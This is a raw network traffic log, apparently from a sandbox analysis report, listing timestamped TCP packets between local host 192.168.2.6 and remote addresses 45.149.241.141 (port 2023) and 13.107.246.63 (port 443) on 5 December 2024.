                                                                                                              Dec 5, 2024 10:39:28.948282957 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.948304892 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.949326038 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.949388027 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.949461937 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.950571060 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.950598001 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.950642109 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.951786995 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.951920986 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.953068018 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.953087091 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.953772068 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.953974009 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.954037905 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.955061913 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.955146074 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.955146074 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.955209017 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.956255913 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.956357956 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.956417084 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.957420111 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.957463980 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.957509995 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.958487988 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.958561897 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.958606005 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.959644079 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.959777117 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.959888935 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.960752010 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.960860968 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.960875034 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.961951971 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.962021112 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.962044001 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.963056087 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.963191032 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.963294029 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.964220047 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.964335918 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.964402914 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.965332985 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.965400934 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.965425968 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.966500998 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.966607094 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.966639996 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.967664003 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.967798948 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.968188047 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.968770981 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.968949080 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.969108105 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.969959021 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.970019102 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.970068932 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.971093893 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.971163988 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.971230030 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.972243071 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.972341061 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.972354889 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.973356009 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.973485947 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.973587990 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.974515915 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.974607944 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.974649906 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.975677967 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.975781918 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.975827932 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.976785898 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.976922035 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.977082014 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.978013039 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.978065968 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.978091002 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.979195118 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.979310036 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.979324102 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.980381966 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.980475903 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.980492115 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.981414080 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.981513023 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.981720924 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.982491016 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.982547045 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.982574940 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.983664036 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.983746052 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.983921051 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.984776974 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.984906912 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.984965086 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.985924006 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.985992908 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:28.986027956 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.987083912 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:28.987199068 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.119245052 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.119384050 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.119579077 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.119992018 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.120055914 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.120495081 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.120927095 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.121054888 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.121845961 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.122035027 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.122275114 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.122358084 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.123281956 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.123433113 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.123562098 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.124336958 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.124383926 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.124440908 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.125498056 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.125597954 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.126699924 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.126817942 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.126928091 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.127125025 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.127760887 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.127865076 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.128093004 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.128901958 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.128998995 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.129203081 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.130058050 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.130202055 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.130307913 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.131249905 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.131397963 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.131555080 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.132369995 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.132467985 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.132707119 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.133496046 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.133582115 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.133836985 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.134628057 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.134686947 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.134848118 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.135796070 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.135840893 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.136074066 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.136918068 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.137109041 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.137489080 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.138102055 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.138211966 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.138308048 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.139200926 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.139343977 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.139559031 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.140347958 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.140522003 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.140666008 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.141473055 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.141537905 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.141608000 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.142669916 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.142843962 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.142970085 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.143798113 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.143948078 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.144380093 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.144953966 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.145051956 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.145131111 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.146100998 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.146176100 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.146287918 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.147216082 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.147360086 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.147483110 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.148340940 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.148484945 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.148789883 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.149492979 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.149593115 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.149727106 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.150629044 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.150734901 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.150975943 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.151815891 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.151902914 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.152070999 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.152915955 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.153055906 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.154068947 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.154174089 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.154181957 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.154283047 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.155225992 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.155363083 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.155726910 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.156383991 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.156431913 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.156513929 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.157471895 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.157618046 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.158087969 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.158646107 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.158735991 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.158849955 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.159882069 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.160000086 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.160146952 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.160917044 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.161026955 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.161286116 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.162158012 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.162307978 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.162416935 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.163254023 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.163386106 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.163463116 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.164386988 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.164496899 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.165086985 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.165698051 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.165777922 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.165992022 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.166661024 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.166748047 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.167275906 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.167813063 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.167896986 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.168131113 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.168993950 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.169049978 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.169481039 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.170068026 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.170388937 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.170623064 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.171216965 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.171331882 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.171538115 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.172373056 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.172493935 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.172614098 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.173516035 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.173619986 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.174655914 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.174715042 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.174748898 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.174880028 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.175875902 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.176043987 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.176105976 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.176991940 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.177086115 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.177275896 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.178087950 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.178219080 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.178560019 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.179203033 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.283090115 CET4434991813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.283759117 CET49918443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:29.283782005 CET4434991813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.287570000 CET49918443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:29.287579060 CET4434991813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.311419010 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.311554909 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.311960936 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.311996937 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.312117100 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.312477112 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.313108921 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.313204050 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.313355923 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.315300941 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.315329075 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.315386057 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.315438032 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.315498114 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.315519094 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.316699982 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.316824913 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.316843987 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.317728996 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.317840099 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.317866087 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.318869114 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.318974018 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.318994045 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.319967031 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.320082903 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.320112944 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.321119070 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.321157932 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.321173906 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.322273016 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.322417974 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.322649956 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.323402882 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.323508024 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.323549986 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.324498892 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.324630022 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.324743986 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.325656891 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.325803041 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.325864077 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.326891899 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.326963902 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.327122927 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.327971935 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.328032970 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.328258991 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.329242945 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.329308033 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.329348087 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:29.330235004 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.330332994 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:29.330429077 CET499122023192.168.2.645.149.241.141
